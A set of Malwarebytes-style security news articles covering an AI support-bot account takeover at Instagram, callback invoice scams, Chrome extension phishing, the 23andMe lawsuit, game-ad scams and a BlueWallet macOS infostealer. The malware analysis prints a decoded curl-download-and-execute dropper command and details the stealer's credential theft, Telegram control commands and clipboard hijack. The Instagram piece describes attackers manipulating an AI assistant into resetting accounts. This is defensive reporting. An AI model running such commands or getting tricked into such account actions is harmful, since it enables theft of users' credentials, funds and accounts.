In fairness to the confused bot, attackers were successful even if the enhanced security was triggered. They would apparently create video deepfakes of their targets using images that were harvested from—you guessed it—Instagram.

Meta hoisted on its own AI petard

Meta has been shedding headcount and pouring money into AI, and rolled out its AI-powered support assistant earlier this year to help handle account recovery and other support requests.

The downside is that the AI appears to have been given the ability to perform actions such as email changes and password resets without applying enough safeguards to confirm the user’s identity first.

Meta communications executive Andy Stone said on X that the issue was resolved and impacted accounts were being secured. The company has not disclosed how many accounts were affected.

What actually worked

Why would anyone want to hack an Instagram account anyway? Revenge can be a driver, but more often than not, financial gain is the goal. Hijackers have blackmailed businesses that rely on those accounts for marketing.

Attackers using this technique have also been spotted targeting “OG” accounts with short or highly desirable usernames. If you joined Instagram early and registered a memorable handle, it can be worth thousands of dollars on underground markets.

What can you do to protect yourself?

A perennial piece of advice still holds: turn on multi-factor authentication (MFA). According to veteran cybersecurity reporter Brian Krebs, the attack failed against accounts that had MFA enabled, including those using SMS codes.

That doesn’t make MFA perfect, but it adds an important layer of protection.

So the practical advice is unglamorous:

• Open Instagram’s Settings
• Navigate to your Meta Accounts Center
• Turn on Two-factor authentication. An authenticator app is better than SMS, but either is better than nothing.

Do it now, because this might not yet be over. TheCyberSecGuru reports that another attack is circulating, this time using an Android emulator called BlueStacks running a modified version of Instagram to send new prompts with hidden characters designed to manipulate the AI.

Expect more snafus from “helpful” bots

This won’t be the last attack against AI chatbots. As more companies use AI to reduce customer support costs, their attack surface will grow, and they’ll make plenty of mistakes as they try to balance security and functionality.

The Meta exploit is patched, but the confused deputy concept is not. And there’s nothing quite as damaging as a confused AI with the keys to your digital life.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

A new batch of fake payment invoices is being staged right now, and we caught the campaign while it was still being put together. The emails impersonate PayPal, Amazon, and Geek Squad, and others, and they all share one goal: to scare you into calling a phone number where a fake “support agent” is waiting.

What makes this wave unusual is that some of the templates we recovered still contained blank fields where the phone number and price should have been, while others were already complete and in circulation. We caught the campaign mid-rollout.

What’s the scam?

If you receive an email that looks like a receipt—“Your subscription renewed for $349,” “You sent a payment of $598.96”—and it tells you to call a number to cancel or dispute the charge, stop.

There is no charge. The email exists to get you on the phone with a scammer who will then try to talk you into handing over remote access to your computer, your card details, or a “refund” that somehow requires you to send them money.

This particular flavor is called a “phantom invoice” or “refund” scam, and the trick is psychological, not technical. That’s why these emails can often slip past spam filters: there’s often no malicious attachment or link for security systems to analyze. The scam is in the phone number you’re urged to call.

If you didn’t make the purchase, there’s no need to call the number in the email to cancel it. Real companies don’t pressure customers into resolving unexpected charges through unsolicited phone numbers.

The goal is simple: create enough concern to get you to call. You see a significant charge you don’t recognize, say $499, and your first instinct is to stop it. The invoice helpfully provides a number to call “if this wasn’t you.” So you call, and now you’re talking to the scammer.

From there, the conversation usually leads to one of a few outcomes. They may ask you to install software so they can “fix” the charge, giving them access to your computer. They may ask for your card or bank details to “process the refund.” Or they may “accidentally” refund too much and ask you to send the difference back, usually by gift card or bank transfer.

The invoice is just the bait, while the phone call is the trap.

These emails are convincing, and some are already reaching inboxes. The good news is that simply receiving one doesn’t put you at risk. The scam only works if it succeeds in getting you to call the number provided. If you recognize the message as fraudulent and delete it, the attack stops there.

If you did call the number and followed instructions from a scammer, run a virus scan and check your bank accounts. Change your critical passwords, enable multi-factor authentication (MFA), and make sure your security software is up to date.

How we caught it half-built

Most scam investigations start after the damage is done. This one was different. We came across a cluster of nearly identical invoice templates that were clearly part of the same kit, and several of them were incomplete.

Where a finished scam email would show a phone number, some of these showed the literal text #TFN# instead, which is just a placeholder. (“TFN” is the scammers’ shorthand for toll-free number, the callback line they route victims to.) Others left the price as #PRICE#, the date as #DATE#, and the recipient as #EMAIL#. These are merge fields—the blanks a bulk-sending tool fills in automatically before a campaign goes out.

Finding those placeholders still in place told us that the operation was still being assembled. Some templates were still half-finished, while others were already complete and carrying live callback numbers. We’d caught the campaign mid-rollout, between being built and fully launched.

Why these invoices look believable

The scammers use familiar brands such as PayPal, Amazon, and Geek Squad. They’re companies people expect to receive receipts and renewal notices from, which lowers suspicion.

The charges are also carefully chosen. Amounts in the few-hundred-dollar range are large enough to cause concern but still seem plausible as a subscription renewal or online purchase.

Many messages add urgency, telling recipients to call quickly to dispute or cancel the charge. This pressure is designed to stop people from verifying the transaction independently.

Some invoices even combine trusted brands, such as claiming a payment was sent through PayPal to Amazon. Referencing multiple well-known companies makes the message appear more credible.

How to spot a fake invoice

The good news is that these scams share warning signs. Once you know what to look for, they get a lot easier to catch. Watch for any of these:

• A charge you don’t remember making. If you don’t recognize the charge, verify it independently through your account or bank. If there’s no record of it, the invoice is likely a lure designed to get you to call.
• A ticking clock. “Call within 12 hours,” “cancel before it renews,” or “act immediately” provide fake urgency designed to stop you thinking. Real billing problems can wait while you check.
• Brands you trust, used as cover. The more familiar the logo, the less carefully people read. Scammers borrow trust they didn’t earn.
• Odd details that don’t quite fit. A PayPal email “from” Amazon, a stray address that belongs to no one, or slightly off wording. Trust the small things that feel wrong.
• Pressure to keep you on the phone. Once you call, a real company would never stop you from hanging up to verify, but a scammer will.

If even one of these is present, treat the whole message as suspicious.

Remember the single rule that defeats this entire scam: A genuine company will never rush you onto a call to undo a payment you never made. If you’re not sure whether a charge is real, close the email and check your account the normal way: by typing the company’s website into your browser yourself, or calling the number on the back of your bank card.

Pro tip: Malwarebytes Scam Guard can help spot scams like these and guide you in what to do next, while Browser Guard will block you from accessing scam websites.

What to do if one of these lands in your inbox

If you receive a suspicious invoice like the ones described here, take a few simple precautions:

• Don’t call the number. That’s the core of the scam. Legitimate refunds or cancellations don’t require you to call a number from an unsolicited receipt.
• Don’t reply or click anything. Treat the message as suspicious, even if it looks legitimate.
• Verify charges independently. If you’re concerned a charge might be real, log in directly to PayPal, your bank, or the retailer by typing the address yourself and reviewing your transaction history.
• Report it. Forward suspected phishing emails to the impersonated company’s abuse address and, in the US, report them to the FTC at reportfraud.ftc.gov. Reporting helps disrupt scam operations.
• If you already called, end the conversation. Don’t install any software they recommend. If you granted remote access or shared payment information, contact your bank immediately and run a trusted security scan on your device.
• Be wary of urgency. Phrases like “within 12 hours” or “cancel now” are designed to pressure you into acting before you think. Take the time to verify the claim independently.

Scammers are increasingly shifting to tactics that software can’t easily inspect. A phone number in an email is difficult for security tools to evaluate, and the actual scam happens over a phone call instead of through a malicious link or attachment.

That’s why finding this campaign during rollout matters. Instead of seeing the damage afterward, we got a look at the preparation: unfinished templates, incomplete details, and the scam kit before it was fully deployed.

The best defense is simple: if an unexpected invoice tells you to call a number immediately, stop and verify the charge independently first.

Indicators of compromise Domains

invoicepdfin[.]xyz

invoicepdfus[.]xyz

invoicepdfusa[.]xyz

invoicerep[.]xyz

invoicestatement[.]xyz

invoicestm[.]xyz

Callback numbers

804-392-2793

801-640-8589

Something feel off? Check it before you click.  

Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

Try it free → 

Have you ever gotten a phone call and had a gut feeling that those random digits looked extra suspicious? It happens to millions of people every day. While many people have trained themselves to ignore such calls, they still pose a threat across the US. In fact, scammers stole more than $21 billion from Americans last year, according to the latest IC3 report.

That’s why we created Scam Number Check.

Now, instead of risking a call with a scammer, you can look up a number and get a clear answer in seconds.

How to use Scam Number Check

We know scam calls happen every day, and they can cost victims a lot of money. So we designed Scam Number Check to be really simple to use. It’s free, private, and instant.

Here’s how:

• Go to Malwarebytes’ Scam Number Check and enter the phone number.
• If the number looks suspicious, you can choose whether to block or report it. Remember, reporting suspicious numbers helps protect others.

Understanding the results

Scam Number Check can provide one of three verdicts when you check a phone number. Here’s what each means and how you should proceed:

• Do not trust this number. Multiple people have flagged this number as a scam. Don’t call back, don’t share personal info, and don’t send money if they ask.
• This number seems safe. Based on available data, this number has not been associated with suspicious activity. It is our recommendation that you proceed with caution in this case.
• We don’t have enough info. No information is available in the threat intelligence database. This doesn’t mean it’s safe, so proceed with caution.

Why it matters

Scammers like to pile on the pressure and create fake urgency so you don’t have time to think. If you don’t recognize a number, let it go to voicemail first. Then check the number with Scam Number Check to see if it’s been linked to scams or suspicious activity. This simple extra step might help you avoid sharing personal information, sending money, or falling for impersonation scams.

Scams are getting harder to spot every day. By making Malwarebytes even better at catching threats, we’re helping you stay one step ahead of scammers and cybercriminals.

Don’t recognize that number? We’ll check it.

CHECK NOW

Phishing has changed. Slowly but surely, cybercriminals are turning to infostealers instead.

Traditional phishing hasn’t gone away. Far from it. But many attackers are no longer focused solely on tricking victims into entering usernames and passwords on fake login pages. Instead, they are using infostealers to quietly collect passwords, cookies, browser data, and other sensitive information from infected devices.

This approach is attractive because it scales well and reduces friction. Instead of relying on a victim to type credentials into a fake site, the malware can harvest logins already saved in browsers, session tokens, autofill data, cryptocurrency wallet details, and even files that contain useful information.

This makes the attack chain less visible. A traditional phishing email often leaves obvious clues: a suspicious link, a fake login page, or a strange attachment. Infostealers are different. They can arrive through malicious online ads (malvertising), cracked software, fake browser updates, game cheats, or dubious download sites, and once installed, they work in the background, stealing whatever the victim’s device has in store.

Part of this shift could be due to the widespread adoption of multi-factor authentication (MFA). By stealing session cookies, cybercriminals can bypass MFA, so they can access accounts without needing a password or authentication code.

Another factor is the rise of the malware-as-a-service (MaaS) ecosystem. Infostealers are cheap to deploy, easy to scale, and highly profitable. Rather than building a full attack chain themselves, many criminals buy access to ready-made stealer kits, loaders, or initial access services from underground vendors. This lowers the barrier to entry and allows less-skilled attackers to run credential theft operations.

In many cases, infostealers are just the first stage of a larger criminal operation. The stolen data is collected, packaged, and sold to other criminals interested in the harvested information. These buyers may specialize in fraud, account takeover, business email compromise, or ransomware. A single infected machine can generate multiple revenue streams: credentials for one buyer, session cookies for another, and corporate access or wallet data for a third.

That division of labor is one reason infostealers have become so persistent. Operators can update their code, rotate infrastructure, and launch new campaigns with minimal effort, while affiliates handle distribution through phishing, malvertising, fake downloads, or social media lures.

How to stay safe

Because infostealers commonly arrive through malvertising, fake browser updates, and one-click downloads, it’s worth treating ads and pop-ups with healthy skepticism. My personal tip: Never click on sponsored ads. Instead, visit official websites directly and download software only from trusted sources such as official vendor sites or app stores.

Another increasingly popular technique is ClickFix, a social engineering attack that tricks users into infecting their own devices. Never run commands or scripts copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. If a website tells you to execute a command or perform a technical action, check official documentation or contact support before proceeding.

Picked up something you shouldn’t have?

RUN A FREE VIRUS SCAN

Pirated software, game cheats, and cracked tools remain some of the most common delivery methods for infostealers. These downloads often come bundled with malware that installs alongside the software you intended to get. The same caution applies to many browser extensions and add-ons that promise extra features or convenience. Stick to extensions from reputable developers, check reviews and permissions carefully, and avoid installing any add-on that asks for more access than it plausibly needs.

Phishing emails are still a major threat, but many can be spotted if you slow down and verify before clicking. Even if an email looks like it comes from a trusted brand, treat unsolicited attachments and links with caution, especially when they urge you to open a file, install something urgently, or fix a billing issue. If you’re unsure, check the sender address, look for typos or odd phrasing, and confirm the request through a separate channel such as the company’s official website rather than the link in the email.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

A new scam is targeting people who publish Chrome extensions.

The scam arrives as an official-looking “copyright removal request” claiming your extension is about to be removed from the Chrome Web Store and that you have 48 hours to appeal.

It even looks personalized. After you enter your extension’s ID to “verify” it, the page pulls in your extension’s real name and icon. But it’s all part of a phishing attack designed to steal your Google username and password.

If attackers gain access to a developer account, they may be able to take over the extension, access developer resources, or potentially push malicious updates to users.

What’s actually going on

If you’ve published a Chrome extension, you might encounter a page that looks like an official Google notice warning that your extension is being removed for copyright infringement.

The page asks you to enter your extension ID, then displays your real extension details alongside a complaint number and countdown clock. It pressures you to sign in with Google to file an appeal before time runs out.

None of it is real. The page is not operated by Google. The complaint, deadline, and countdown are fabricated. The goal is to trick you into entering your Google username and password into a fake sign-in window controlled by the scammer.

The most important rule to remember: Genuine warnings about your extension appear in your Chrome Web Store developer dashboard, not on a third-party website.

Why scammers want developer accounts

Chrome extensions have access to users’ browsers, and they can be updated automatically.

If attackers gain control of a developer account, they may be able to modify an extension, access developer resources, or potentially distribute malicious updates to existing users.

That’s what makes developer accounts such attractive targets, and why scams like these are prevalent.

What the scam looks like

The page is hosted on a domain that has nothing to do with Google. In the version we analyzed, the site used the address dmca-chrome-extensions[.]click.

Despite that, it uses Google’s branding and presents itself as a “Chrome Web Store Developer Policy Center.”

The page first asks for the link or ID of your extension. That seems harmless, which is exactly why it works.

It uses your own extension to look convincing

After you enter your extension ID, the page briefly displays a “Looking up extension…” message and then builds a fake takedown notice around your real extension.

When we tested the scam with Malwarebytes Browser Guard, it displayed our genuine extension name, icon, and Chrome Web Store listing alongside the fake complaint.

The site is simply pulling publicly available information from your extension’s Chrome Web Store page. Anyone can see that information. The scammers use it to make the fake notice appear legitimate.

Everything else is invented.

The complaint number, “date received,” 48-hour deadline, countdown timer, and timeline of events are generated by the scam page itself.

The countdown is there to rush you

A red warning banner claims your extension will be permanently removed unless you act within 48 hours, and a clock counts down by the second. The whole layout pushes you toward one button: sign in with Google to “verify your identity” and file your appeal. 

The urgency is designed to create pressure so you react before taking the time to verify the claim.

The fake sign-in window

When you click “Continue to verification,” a Google sign-in window appears with a title bar, padlock, and address showing accounts.google.com.

It looks authentic, but it isn’t.

The “window” is actually part of the web page itself. The padlock and address are just graphics designed to look like a real browser window.

The scammers even tailor the appearance to match your operating system, showing Mac-style windows on macOS and Windows-style windows on Windows devices.

Anything typed into this fake sign-in form is sent directly to the scammers.

One giveaway is that the window cannot leave the browser page. Try dragging it to the edge of your screen and it stops at the browser border. Minimize the browser and it disappears as well.

Most importantly, your browser’s real address bar still shows the scam site’s address, not Google’s.

How to stay safe

The good news is that a few simple habits defeat this scam.

• Don’t trust the link. If you receive a warning about your extension, go directly to your Chrome Web Store developer dashboard and check there.
• Be suspicious of urgency. Legitimate policy processes don’t rely on countdown clocks to force immediate action.
• Check the address bar. A real Google sign-in page appears at accounts.google.com in your browser’s actual address bar.
• Test the window. If a sign-in window can’t be dragged outside the browser or disappears when the browser is minimized, it’s probably fake.
• Turn on stronger sign-in protection. Passkeys and hardware security keys make stolen passwords far less useful to attackers.
• Use security software with phishing and web protection. Our Browser Guard, which is also part of Malwarebytes Premium can help block malicious websites and phishing pages before you enter sensitive information.

This isn’t a crude phishing page. It uses your real extension details, mimics Google’s branding, and creates a convincing sense of urgency.

If you receive a warning about your extension, don’t follow the link and don’t race the countdown. Go directly to your Chrome Web Store developer dashboard and verify the claim there.

When in doubt, close the tab.

If you already entered your details

Act quickly.

• Change your Google password immediately from a trusted device.
• Sign out of all active sessions in your Google account security settings.
• Review connected apps and devices for anything unfamiliar.
• Turn on two-step verification, preferably using a passkey or security key.
• Check your Chrome Web Store listings for changes, uploads, or new versions you didn’t publish.

Indicators of Compromise (IOCs)

Domain

dmca-chrome-extensions[.]click

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

California has sued the former shell of DNA testing company 23andMe over alleged security failures and misleading statements surrounding its 2023 data breach.

On May 27, 2026, Attorney General Rob Bonta filed suit in San Francisco Superior Court against Chrome Holding Co., the company now handling 23andMe’s remaining assets following its bankruptcy.

California’s complaint accuses 23andMe of failing to implement reasonable security measures to protect sensitive data and alleges violations of several state privacy and consumer protection laws. It also accuses the company of making misleading statements about its security practices.

The 2023 breach used old-school credential-stuffing tactics against 23andMe’s login page. Attackers operated inside the systems for roughly five months without anyone noticing. The direct compromise was modest, affecting about 14,000 accounts, but that was all the attackers needed to steal the data of just under seven million customers.

The intruders pivoted from those accounts through DNA Relatives, the platform’s headline feature, which enabled people to determine who they were connected with through DNA similarity. The lawsuit alleges a critical coding error in that feature enabled the perpetrators to scrape data from millions of other users connected by biological kinship.

The victim-blaming defense became evidence

After the breach went public, 23andMe sent victims’ legal representatives a letter blaming users for reusing passwords from sites that had been compromised earlier. The exposed data, the company suggested, had been shared of the users’ own free will and would not cause “pecuniary harm.”

The harms stemming from genetic data theft extend far beyond financial losses, however. The genetic information that was stolen enabled thieves to determine an individual’s genetic origins.

The data was reportedly offered for sale on the dark web with this information as a selling point, enabling sellers to offer records on Asian American Pacific Islander (AAPI) or Jewish customers, for example. Bonta’s office pointed out that antisemitic violence was on the rise at the time.

In spite of the letter’s attempt to blame users, only about 14,000 accounts were directly compromised through password reuse. The rest of the data was allegedly exposed through 23andMe’s own product. According to the complaint, the coding error in DNA Relatives exposed the data of anyone who had opted into the service, not just those linked to the 14,000 compromised accounts.

Can the state recover damages?

California is seeking statutory penalties ranging from $1,000 to $7,500 per violation. With 855,541 Californians among the affected users, the costs could mount up quickly.

The question is how much of it the state will collect if it wins its case. 23andMe filed for Chapter 11 bankruptcy in March 2025, then sold most of its assets, including the genomic data of more than 15 million customers, to TTAM Research Institute, a nonprofit founded by former 23andMe CEO Anne Wojcicki. California and several other states opposed the sale on Genetic Information Privacy Act grounds, but a federal bankruptcy judge approved it. The states are now appealing that decision.

Chrome Holding Co., the corporate shell that remains of 23andMe, received $305 million from that sale. But others have already been picking over what’s left.

Other regulators have already had their turn. The UK Information Commissioner’s Office fined 23andMe £2.31 million in June last year following a joint investigation with the Privacy Commissioner of Canada. A federal court initially approved a $30 million class-action settlement covering most US customer claims. That settlement later grew to $50 million and received final approval in January 2026.

What customers can do

If you tested with 23andMe, the standard breach hygiene still applies. Reset any password you reused on other sites and turn on multi-factor authentication wherever it’s offered. Credential stuffing only works on usernames and passwords that have already been exposed elsewhere. Also watch for phishing attacks that name-drop 23andMe or the breach itself. And maybe weigh the benefits of using DNA testing services against the security risks.

Because there’s one part of this that no fine and no settlement can solve: stolen genetic data sold on the dark web cannot be taken back. Passwords can be changed. DNA can’t.

Browse like no one’s watching. 

Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free → 

Sometimes it happens. You’re happily playing a game on your phone or laptop when suddenly alarms pop up out of nowhere:

“Your device is infected!”

“Your iCloud is full!”

“Your account is restricted for watching porn!”

Some games can be played for free if you agree to watch ads, and in others you can get extra lives, perks, or boosters by watching ads. That’s fine, as long as you’re given a choice and the ads are legitimate.

Unfortunately, cybercriminals sometimes manage to buy advertising space and use it to defraud gamers.

Let’s look at some examples.

The iCloud storage scam, or its OneDrive equivalent, is a well-known and long-running scam that claims you need to expand your storage or all your files will be deleted. The websites these messages link to come in many forms, but they all ask for personal and payment details to complete the upgrade.

“Your account has been restricted.
We have detected that your device has been hacked after visiting adult websites.
Solution:
1:Click the “OK” button below;

2:You will be redirected to App Store;

3:Install and open the app, then run the cleanup program.”

This ad is a scam and uses a classic scare tactic. It falsely claims your device has been hacked and tries to pressure you into clicking “OK” and installing a cleanup app.

Messages like this sometimes claim to be from your ISP, a “Security Department,” or a generic “Safety Center.”

“Apple Security Alert
8 viruses have been detected on your iPhone. Now iOS is damaged by 72%. Further damage to the system will result in device lockup and loss of all data within two minutes.
Please click the button below to remove all viruses.”

This is another fake warning, commonly used by scammers to trick users into clicking links or downloading unnecessary or harmful software. Apple doesn’t send alerts like this, and these messages use vague threats to get your attention.

What kind of app you’re really installing if you follow the instructions depends on your device and your location. If you’re “lucky,” it’s just adware, but you might just as easily end up with an infostealer.

In many cases, you’ll end up with fleeceware, a type of deceptive mobile app where developers lure users in with short free trials that quickly convert into hidden subscription fees, sometimes costing hundreds of dollars per month. These apps often offer some functionality to stay on the barely legal side of things, but at wildly inflated prices.

How to stay safe

The best response to these messages is simply to ignore them.

Real system alerts come from the OS, not from inside a game window or browser tab. Here’s a simple test: If you can switch apps and the “warning” disappears with the browser/game, it was not a system‑level alert.

Check the destination URLs before proceeding. Apple, Google, and major ISPs use predictable domains. A familiar-looking URL is not proof that a message is legitimate, but if the URL looks suspicious, it should definitely be treated as a scam.

Scam or legit? Scam Guard knows.

TRY IT NOW

You may arrive at something that looks like the official App Store or Google Play Store. Be wary of lookalike app stores and unofficial download sites, but if you are on the real store, the app is generally safer to install. However, it’s still worth checking reviews, permissions, and the developer before proceeding.

Visit the official website of the organization the message claims to be from and log in there. If there’s a genuine problem with your account, storage, or device, you’ll find information about it through official channels.

Use an up-to-date, real-time anti-malware solution on your devices that can detect and block malicious apps.

Scammers know more about you than you think. 

Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in. 

Download for iOS → Download for Android → 

A fake website impersonating BlueWallet (a real Bitcoin wallet) is targeting Mac users with a simple but effective attack. BlueWallet itself has not been compromised. Instead, cybercriminals have stolen the name and branding of the legitimate Bitcoin wallet to make a malicious download appear trustworthy.

If you went looking for a cryptocurrency wallet and landed on one of these fake BlueWallet download pages, the site tried to trick you into opening a downloaded file in a built-in macOS tool and pressing “Run.” If you followed those instructions, the malware could steal saved passwords, browser logins, cryptocurrency wallets, documents, and other sensitive data. It also watches the clipboard for cryptocurrency wallet addresses and can replace them with attacker-controlled addresses..

That last feature is particularly dangerous. If you copy a wallet address before sending funds, the malware can silently replace it with the attacker’s address. Everything looks normal on screen, but the money goes somewhere else.

Should you worry? Only if you downloaded and ran the file. Simply visiting the page and closing it does nothing on its own. The attack depends entirely on the user opening the script and pressing play.

If you did run it, treat the machine as compromised and follow the steps below.

What to do if you may have run it

If you opened the file and pressed play, assume your device was compromised and work through these steps:

• Disconnect the machine from the network to cut the control channel
• Run a full scan of the device, and make sure you’re using up-to-date security software with web protection enabled
• From a different, trusted device, change passwords for any accounts used on the Mac, starting with email and cryptocurrency exchanges
• Move any cryptocurrency to a new wallet created on a clean device
• Treat existing seed phrases and keys as exposed
• Before sending crypto in future, verify the full destination address character by character
• Check for and remove unfamiliar files in ~/Library/LaunchAgents
• Look for a hidden .sysupd.sh file in /tmp
• Rotate cloud and SSH credentials if .ssh, .aws, or .gnupg files were present on the machine
• When in doubt, back up your data and reinstall macOS from a known-good source rather than trying to clean in place

Picked up something you shouldn’t have?

RUN A FREE VIRUS SCAN

Social engineering tricks

The most interesting part of this campaign isn’t technical. The attackers didn’t break into the Mac or bypass Apple’s security protections. They persuaded victims to run the malware themselves.

The fake website walks users through the process with a convincing download page, simple instructions, and even a keyboard shortcut. The attack succeeds because the victim trusts what they are seeing.

As operating systems get better at blocking malicious software, attackers are increasingly investing in social engineering. Instead of finding ways around security controls, they convince people to click through them.

That’s why one habit is becoming increasingly important: Be suspicious of any download that arrives with instructions to open it in a scripting tool, developer utility, or Terminal window and press “Run.”

In this campaign, a single press of ⌘R was enough to turn a Mac into a password stealer, cryptocurrency wallet thief, clipboard hijacker, and remote access tool.

Technical analysis Stage one: The AppleScript downloader

The page lives at update-bluewallet[.]com, a domain name close enough to the real wallet (bluewallet.io) to pass a quick glance. The first thing the page does is not wait for consent. Its script calls a download routine on a two-second timer the moment the page loads, and again if the visitor clicks either of two buttons.

The file that lands in the Downloads folder is named BlueWallet Installer.applescript, an extension most people have never seen and have no instinct to distrust.

Then the page does something quietly clever. After a short delay, it rewrites its own status text to read like setup instructions: open the installer, then press the play button or ⌘R. It even draws a small blue play triangle in the text so the wording matches the real Script Editor interface the victim is about to see.

The page walks the victim through the exact motions needed to run the file.

On modern macOS, an unsigned application downloaded from the web gets quarantined and checked before it can run. A plain script opened in Script Editor and executed by the user sidesteps that flow. The person is manually instructing a trusted Apple tool to run code, so there is no notarization gate to fail.

This is why the attacker chose an AppleScript instead of a packaged app: it moves the risky action out of the operating system’s hands and into the victim’s.

The AppleScript itself is remarkably short. Stripped of its decorative comments, including a fake version number and a line claiming to be a “Brew Install Upgrade,” it runs a single base64-encoded shell command and then tells Script Editor to quit without saving, removing the evidence from view.

Decoded, that command does this:

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

It fetches a second script from a remote host, saves it to a hidden file in the temp directory, makes it executable, and runs it in the background with all output suppressed.

The victim sees nothing. The filename .sysupd.sh is dressed up to look like a system update. This is a textbook staged dropper: stage one is tiny and disposable, and its only job is to fetch the real payload.

Stage two: Payload analysis

The first lines establish how the malware intends to operate. It sets umask 077 so everything it creates is readable only by the compromised user, then builds a hidden, randomly named working directory under /tmp seeded from /dev/urandom.

Its configuration is obfuscated, but weakly. A small function named _xd walks a hex string two characters at a time and XORs each byte against a hardcoded repeating key: swckR9JCD2Uu.

That function decodes the script’s Telegram bot token, chat identifier, secondary command token, and staging URL at runtime. It is enough to defeat tools that only search for plaintext strings, but not much more. Because the key and algorithm are both sitting in the file, every encoded value is fully recoverable.

One detail stands out: The decoded Telegram chat value and decoded command-and-control chat value are identical. The attacker is using a single Telegram channel as both the exfiltration drop and the control channel. It is cheap, scalable, encrypted, and blends into ordinary HTTPS traffic.

Not everything is obfuscated. The clipboard-hijacking addresses are sitting in the file in plain text: a Bitcoin address, an Ethereum address, and a Solana address. These are the addresses the implant swaps in when it catches you copying a wallet address. Because they are public on their respective blockchains, they are also among the most useful artifacts in the whole sample.

What the malware steals

The second stage’s collection routines are sweeping. They pull from six broad categories.

1. Web browsers

The script extracts history, cookies, login data, and bookmarks from a wide range of browsers, including:

• Chromium-based browsers: Google Chrome Stable, Beta, Canary, and Dev; Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; and Yandex
• Firefox-based browsers: Firefox, Waterfox, Pale Moon, Zen, and LibreWolf
• macOS native browser data: Safari cookies, history, and form values

2. Cryptocurrency wallets

This appears to be the script’s primary focus.

It targets desktop wallet applications including Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, and Tonkeeper.

It also targets browser-extension wallets across several ecosystems:

• Bitcoin: Xverse, Leather, UniSat, Alby, and Wizz
• Solana: Phantom, Solflare, Backpack, Nightly, MagicEden, Sollet, and Slope
• EVM wallets: MetaMask, Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin, and XDEFI
• Cosmos: Keplr, Station, and Cosmostation
• Other ecosystems: Yoroi, Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos, and Temple

3. Password managers and security tools

The malware targets local storage and settings for several password managers, including LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, and Buttercup.

It also looks for data associated with 2FA and authenticator tools, including Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, and FreeOTP.

4. Communication and social apps

The script attempts to copy session data and local storage for Telegram Desktop and Discord, including Discord Canary and Discord PTB.

5. Developer and cloud tools

It looks for credentials and configuration files in the user’s home directory, including:

• AWS CLI configurations in .aws
• SSH keys in .ssh
• GnuPG keys in .gnupg
• Kubernetes configs in .kube
• Shell and Git files including .zshrc, .zsh_history, .bash_history, and .gitconfig

6. Productivity apps and general files

The script copies the local Apple Notes database, NoteStore.sqlite.

It also looks for browser-extension data related to shopping and productivity tools, including Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, and Google Keep.

Finally, it scans Desktop, Documents, and Downloads for files with extensions including .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, and .env, under a size cap.

What it does with the stolen data

The malware tries to capture the user’s account password directly. An osascript dialog titled “System Preferences” asks the user to re-enter their password “to continue.” The script validates each attempt against dscl . authonly before saving it, so it only stops once it has a working credential.

For exfiltration, it archives the staged data with macOS’s own ditto, likely because it is always present, unlike zip. To stay under Telegram’s 50 MB upload limit, it breaks larger archives into 49 MB chunks with split before sending each part.

It establishes persistence by writing a LaunchAgent plist into the user’s ~/Library/LaunchAgents, backed by a hidden support directory, and loading it with launchctl so the implant runs again at every login.

The clipboard hijack is a live background loop. A clip_watch function continuously inspects the clipboard, matches Bitcoin, Ethereum, and Solana address formats by regex, reports the original address to the command-and-control channel, and overwrites the clipboard with the attacker’s address via pbcopy.

That means the substitution happens silently between copy and paste.

Finally, the malware can be controlled interactively. A c2_loop polls the Telegram bot for commands and supports a full operator toolkit:

• /info for system details
• /exec for arbitrary shell commands
• /clipboard to read current clipboard contents
• /download to pull specific files
• /exfil to rerun the theft module
• /selfdestruct to wipe traces

This makes the Telegram channel a real-time remote-control link, not just a one-way drop.

Living off the land, and off Telegram

The pattern here is familiar and getting more common: lean on tools that are already trusted.

The delivery abuses Apple’s own Script Editor. The configuration hides behind a trivial XOR rather than packed binaries. The command channel rides Telegram’s Bot API, which can pass through egress filters that would flag an unknown server.

None of these pieces is novel on its own. The effectiveness comes from stacking legitimate-looking components so no single step trips an alarm.

Detection opportunities

The lessons here are less about the lure and more about the technique itself.

Script Editor executing a one-line base64 do shell script that immediately quits is a strong behavioral signal, and a far better detection target than the disposable stage-one file. So is a hidden /tmp/.sysupd.sh downloaded by curl and launched in the background.

Browsers and download surfaces could treat .applescript files arriving from the web with the same suspicion as executables. And Telegram remains an under-addressed command-and-control medium that bot-token abuse reporting could disrupt at the source.

Indicators of Compromise File hashes (SHA-256)

• 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

Network indicators

• update-bluewallet[.]com
• projects2026box[.]com

Clipboard-hijack addresses

• BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
• ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA
